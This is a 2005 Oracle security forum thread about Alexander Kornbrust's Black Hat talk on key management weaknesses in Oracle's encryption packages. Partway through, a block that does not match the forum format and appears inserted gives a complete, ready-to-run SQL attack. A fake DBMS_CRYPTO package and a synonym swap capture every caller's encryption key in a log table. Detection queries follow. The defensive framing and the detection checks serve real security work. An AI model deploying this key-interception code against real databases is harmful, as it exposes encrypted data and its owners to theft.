Pete Finnigan's Oracle Security Forum (http://www.petefinnigan.com/forum/yabb/YaBB.cgi)
(Message started by: rado on Jul 27th, 2005, 7:51am)

Title: Alexander Kornbrust - Black Hat 2005 Presentation
Post by rado on Jul 27th, 2005, 7:51am
What do you think about the latest info coming from Alex Kornbrust? It seems that there is no safe way to keep the data inside the database secured. Is there someone who attended this Black Hat presentation and who could write more details in the forum about Alex's findings?
URL from the news:
Oracle's encryption not secure, researcher says (http://www.computerworld.com/securitytopics/security/holes/story/0,10801,103473,00.html?source=NLT_PM&nid=103473)
The best encryption that DBMS_OBFUSCATION_TOOLKIT offers is 192-bit encryption using the Triple DES (3DES) algorithm in Oracle9i. I don't know how this has changed in 10g, but it seems that it doesn't matter because anyway, everyone who has a DBA account can decrypt the data. Is Transparent Data Encryption (coming with 10g) the only preferable way to keep the data secure, especially when there is a requirement coming from "security company standards"? For example, I know that for all companies that are working with Visa, there is a requirement for at least a 256-bit or 512-bit (I am not sure) encryption key that they must use.
I just want to initiate some discussion about this subject - "How to keep our data secured within an Oracle database by using encryption"

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Pete Finnigan on Jul 27th, 2005, 2:33pm
Hi Rado,

Thanks for your post about Alex's talk at Black Hat in Las Vegas. I have seen the text for his talk and was also aware of the news article you mention but I don't think I can talk about specific details here yet as I don't know if it has been given yet or whether the talk notes would be made public. I am reasonably sure Alex will publish them on his own site Red Database Security (http://www.red-database-security.com) when he gets back.

That said, we can still discuss the general issue. I want to make two points really for now. The first is that the underlying problem with Oracle's DBMS_OBFUSCATION_TOOLKIT and DBMS_CRYPTO packages is not the algorithms themselves but the issue of key management. This is an issue to which Alex alludes in his talk. There are other issues as well.

The second issue is that at present TDE in 10gR2 doesn't on the surface look any more secure than the previous methods employed by Oracle. A number of bugs have already been found in TDE that allow the keys to become known easily.

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by rado on Jul 27th, 2005, 3:24pm
Hi, Pete

Thank you for your reply. Oracle is making many efforts to improve database security, but for now there are so many bugs and findings being discovered very frequently. The latest thing, a "patch for the security patch", doesn't sound good.

I support the idea of opening this kind of forum, related mainly to Oracle security, and I hope that it will become very popular.

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Pete Finnigan on Jul 27th, 2005, 4:42pm
Hi Rado,

Thanks for your reply. Yes, you are right, at the moment there are a lot of issues with bugs, patches that need to be patched, silent fixes, advisories released for unfixed bugs and of course the fact that a lot of bugs are still not fixed (those reported on sites such as Red Database Security (http://www.red-database-security.com) and Argeniss (http://www.argeniss.com)), but we should not forget that Oracle has made some great strides forward with new functionality (TDE, OS audit as XML, FGA and RLS...) in recent years and has also improved its patch process a bit, at least on the documentation side. There needs to be work done on getting fixes out quicker and also on their recent problems of patches for patches, quality and testing. But it is better than the random security advisories we had before, which no one knew when to expect and which included much less detail.

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by rado on Jul 29th, 2005, 7:41am
Hi All,

For everyone who is interested - the link for the previously mentioned presentation:
http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Kornbrust/BH_US_05-Kornbrust.pdf (http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Kornbrust/BH_US_05-Kornbrust.pdf)

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Pete Finnigan on Jul 29th, 2005, 3:21pm
Hi Rado,

Have you managed to open it? I tried to view it in IE and also downloaded it but neither option worked. I have emailed blackhat to ask if it is a problem their end.

cheers

Pete

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Pete Finnigan on Jul 29th, 2005, 3:26pm
Plus, I forgot to mention Esteban Martínez Fayó - his presentation is available here (http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Fayo/BH_US-05-Fayo.pdf) and Cesar Cerrudo's is available here (http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Cerrudo.pdf). At the moment I cannot read theirs either..:-( - I will get a newer version of Acrobat and see if that works. As far as I know Alex, Esteban, Cesar and David Litchfield were the only ones to talk about Oracle.

cheers

Pete

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by rado on Jul 29th, 2005, 3:40pm
Hi, Pete

I sent them as three attached PDF files to your official email.

Best regards

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by kornbrust on Aug 4th, 2005, 2:59pm
Hello

an updated version of the presentation is available on my website:


Cheers

Alexander Kornbrust

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Pete Finnigan on Aug 4th, 2005, 3:42pm
Thanks Alex,

welcome to the forum!

cheers

Pete

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by kornbrust on Aug 4th, 2005, 6:34pm
Hello

Here is a short summary of my presentation. Interception of encryption keys is easy if a hacker (or DBA) installs a special package which intercepts all parameters and passes them on to the original package. DBA permission is not always required.


1. Install a dbms_crypto package with the same specification as the original dbms_crypto.

For a sample, see dbms_crypto_fake.sql.

2. Create a private synonym or modify the public synonym.

That's all. You find all encryption keys in the log file of your web server.


It is possible to mitigate the risk (a little bit) by

 * using fully qualified names (e.g. SYS.DBMS_CRYPTO)

Regards

Alex
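
The two steps above, shown end to end as an added illustration (this is not Alex's dbms_crypto_fake.sql, which is not reproduced in this thread, and not Oracle code). The schema names EVIL and APP, the table EVIL.KEY_LOG and the grants are assumptions. The wrapper mirrors only the ENCRYPT entry point and three constants of SYS.DBMS_CRYPTO; a complete fake would have to mirror the whole specification or dependent code would fail to compile. Captured keys go to a local table here instead of a web server log, which is the channel the post mentions. Sample plaintext and key are constructed. The last two queries are the check a DBA can run for this kind of shadowing.

```sql
-- Assumed: EVIL has CREATE TABLE/PACKAGE/SYNONYM and EXECUTE on SYS.DBMS_CRYPTO
-- (DBMS_CRYPTO is not granted to PUBLIC by default), APP is the victim schema.

-- 1. Table that receives every key passed through the wrapper (assumed name).
CREATE TABLE evil.key_log (
  captured_at TIMESTAMP DEFAULT SYSTIMESTAMP,
  caller      VARCHAR2(128),
  typ         NUMBER,
  key_hex     VARCHAR2(4000)
);

-- 2. Package with the same name and the same ENCRYPT signature as SYS.DBMS_CRYPTO.
--    Constants are mirrored so that DBMS_CRYPTO.ENCRYPT_AES256 etc. still resolve
--    once the synonym points here. Signature copied from the DBMS_CRYPTO docs:
--    ENCRYPT(src RAW, typ PLS_INTEGER, key RAW, iv RAW DEFAULT NULL) RETURN RAW.
CREATE OR REPLACE PACKAGE evil.dbms_crypto AS
  ENCRYPT_AES256 CONSTANT PLS_INTEGER := SYS.DBMS_CRYPTO.ENCRYPT_AES256;
  CHAIN_CBC      CONSTANT PLS_INTEGER := SYS.DBMS_CRYPTO.CHAIN_CBC;
  PAD_PKCS5      CONSTANT PLS_INTEGER := SYS.DBMS_CRYPTO.PAD_PKCS5;

  FUNCTION encrypt(src IN RAW, typ IN PLS_INTEGER, key IN RAW,
                   iv IN RAW DEFAULT NULL) RETURN RAW;
END dbms_crypto;
/

CREATE OR REPLACE PACKAGE BODY evil.dbms_crypto AS
  FUNCTION encrypt(src IN RAW, typ IN PLS_INTEGER, key IN RAW,
                   iv IN RAW DEFAULT NULL) RETURN RAW IS
    PRAGMA AUTONOMOUS_TRANSACTION;   -- the log entry survives a caller rollback
  BEGIN
    INSERT INTO evil.key_log (caller, typ, key_hex)
    VALUES (SYS_CONTEXT('USERENV', 'SESSION_USER'), typ, RAWTOHEX(key));
    COMMIT;
    -- Forward to the genuine package so the caller gets the expected ciphertext.
    RETURN SYS.DBMS_CRYPTO.encrypt(src, typ, key, iv);
  END encrypt;
END dbms_crypto;
/

GRANT EXECUTE ON evil.dbms_crypto TO app;

-- 3. Redirect unqualified references. A private synonym in the victim schema
--    takes precedence over the public synonym; replacing the public synonym
--    instead needs the CREATE PUBLIC SYNONYM privilege rather than DBA.
CREATE SYNONYM app.dbms_crypto FOR evil.dbms_crypto;
-- or: CREATE OR REPLACE PUBLIC SYNONYM dbms_crypto FOR evil.dbms_crypto;

-- 4. Victim code that uses the unqualified name now runs through the wrapper.
--    Key and plaintext below are constructed sample values.
DECLARE
  k RAW(32) := UTL_RAW.cast_to_raw('0123456789abcdef0123456789abcdef');  -- 32 bytes for AES-256
  c RAW(64);
BEGIN
  c := dbms_crypto.encrypt(
         UTL_RAW.cast_to_raw('secret'),
         dbms_crypto.ENCRYPT_AES256 + dbms_crypto.CHAIN_CBC + dbms_crypto.PAD_PKCS5,
         k);
END;
/
-- SELECT caller, typ, key_hex FROM evil.key_log;  -- now holds APP's key in hex

-- 5. Mitigation from the post: a fully qualified call is never resolved via a synonym.
--    c := SYS.DBMS_CRYPTO.encrypt(src, typ, k);

-- 6. Check: any DBMS_CRYPTO / DBMS_OBFUSCATION_TOOLKIT object outside SYS, or any
--    synonym for them that is private or does not point at SYS, is suspicious.
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE object_name IN ('DBMS_CRYPTO', 'DBMS_OBFUSCATION_TOOLKIT')
   AND owner <> 'SYS';

SELECT owner, synonym_name, table_owner, table_name
  FROM dba_synonyms
 WHERE synonym_name IN ('DBMS_CRYPTO', 'DBMS_OBFUSCATION_TOOLKIT')
   AND (owner <> 'PUBLIC' OR table_owner <> 'SYS');
```

Run the two queries regularly (or from a job) and expect exactly one row from the second, the PUBLIC synonym pointing at SYS, and none from the first; anything else means an unqualified call somewhere is no longer reaching Oracle's package.
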

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Joshua Wright on Aug 5th, 2005, 8:35pm
Alex,

Your presentation materials are awesome.  I really enjoyed reading them, especially the nonsense quotes in the beginning of the presentation.

Thank you,

-Josh

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by kornbrust on Aug 6th, 2005, 2:59pm
Josh,

Most people believe that the product documentation or specialised books are saying the truth.

DBMS_CRYPTO/DBMS_OBFUSCATION_TOOLKIT is nearly useless in the current architecture. This also has side effects on the Oracle product stack.

Oracle itself is not able to store the passwords/data in a secure manner. That is probably the reason why Oracle itself uses dbms_crypto/dbms_otk very rarely. I know of only 4 components (Ultrasearch, MGW, DM and Grid Control) in the database that use dbms_crypto/otk.

Regards

Alex


